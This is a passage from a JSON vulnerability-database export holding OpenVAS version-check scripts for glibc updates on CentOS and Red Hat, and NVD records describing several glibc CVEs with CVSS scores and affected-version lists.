rpm:\"glibc-profile~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881217", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881217", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0125 centos4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0125 centos4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881217\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:48:09 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0125\");\n script_name(\"CentOS Update for glibc CESA-2012:0125 centos4\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment variables in the environment of a script that\n performed shell evaluation on the output of the locale command, ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:58:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2018-01-08T00:00:00", "published": "2012-07-09T00:00:00", "id": "OPENVAS:870629", "href": "http://plugins.openvas.org/nasl.php?oid=870629", "type": "openvas", "title": "RedHat Update for glibc RHSA-2011:1526-03", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2011:1526-03\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system\n cannot function properly.\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n Red Hat would like to thank Dan Rosenberg for reporting the CVE-2011-1089\n issue.\n\n This update also fixes several bugs and adds various enhancements.\n Documentation for these bug fixes and enhancements will be available\n shortly from the Technical Notes document, linked to in the References\n section.\n\n Users are advised to upgrade to these updated glibc packages, which contain\n backported patches to resolve these issues and add these enhancements.\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-December/msg00004.html\");\n script_id(870629);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:36:25 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2009-5064\", \"CVE-2011-1089\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1526-03\");\n script_name(\"RedHat Update for glibc RHSA-2011:1526-03\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.47.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T05:40:09", "description": "** DISPUTED ** ldd in the GNU C Library (aka glibc or libc6) 2.13 and earlier allows local users to gain privileges via a Trojan horse executable file linked with a modified loader that omits certain LD_TRACE_LOADED_OBJECTS checks. NOTE: the GNU C Library vendor states \"This is just nonsense. There are a gazillion other ways to introduce code if people are downloading arbitrary binaries and install them in appropriate directories or set LD_LIBRARY_PATH etc.\"", "edition": 6, "cvss3": {}, "published": "2011-03-30T22:55:00", "title": "CVE-2009-5064", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5064"], "modified": "2012-01-19T03:44:00", "cpe": ["cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:1.09.1", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:1.05", "cpe:/a:gnu:glibc:1.02", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:1.08", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:1.07", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:1.09", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:1.01", "cpe:/a:gnu:glibc:1.00", "cpe:/a:gnu:glibc:1.03", "cpe:/a:gnu:glibc:1.06", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:1.04", "cpe:/a:gnu:glibc:2.0.1"], "id": "CVE-2009-5064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-5064", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.09.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.09:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.07:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.08:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.00:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.06:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:08", "description": "The svc_run function in the RPC implementation in glibc before 2.15 allows remote attackers to cause a denial of service (CPU consumption) via a large number of RPC connections.", "edition": 6, "cvss3": {}, "published": "2013-05-02T14:55:00", "title": "CVE-2011-4609", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4609"], "modified": "2013-05-03T04:00:00", "cpe": ["cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.14", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.13", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.1.9"], "id": "CVE-2011-4609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4609", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:09", "description": "Integer overflow in the __tzfile_read function in glibc before 2.15 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted timezone (TZ) file, as demonstrated using vsftpd.", "edition": 6, "cvss3": {}, "published": "2013-05-02T14:55:00", "title": "CVE-2009-5029", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5029"], "modified": "2013-05-03T12:39:00", "cpe": ["cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.14", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.13", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.1.9"], "id": "CVE-2009-5029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-5029", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:00", "description": "The addmntent function in the GNU C Library (aka glibc or libc6) 2.13 and earlier does not report an error status for failed attempts to write to the /etc/mtab file, which makes it easier for local users to trigger corruption of this file, as demonstrated by writes from a process with a small RLIMIT_FSIZE value, a different vulnerability than CVE-2010-0296.", "edition": 6, "cvss3": {}, "published": "2011-04-10T02:55:00", "title": "CVE-2011-1089", "type": "cve", "cwe": ["CWE-16"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.3, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1089"], "modified": "2016-12-07T18:15:00", "cpe": ["cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.12.1", "cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.12.0", "cpe:/a:gnu:glibc:2.12.2", "cpe:/a:gnu:glibc:1.09.1", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.3.10", "cpe:/a:gnu:glibc:2.11.3", "cpe:/a:gnu:glibc:1.05", "cpe:/a:gnu:glibc:1.02", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:1.08", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:1.07", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.10.2", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:gnu:glibc:2.13", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:1.09", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:1.01", "cpe:/a:gnu:glibc:1.00", "cpe:/a:gnu:glibc:1.03", "cpe:/a:gnu:glibc:2.2.4", "cpe:/a:gnu:glibc:1.06", "cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.5.1", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.11.2", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:1.04", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.1.3.10", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.1.9", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.3.1"], "id": "CVE-2011-1089", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1089", "cvss": {"score": 3.3, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.09.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.09:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.07:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5.1:*:*:*:*:*:*:*", 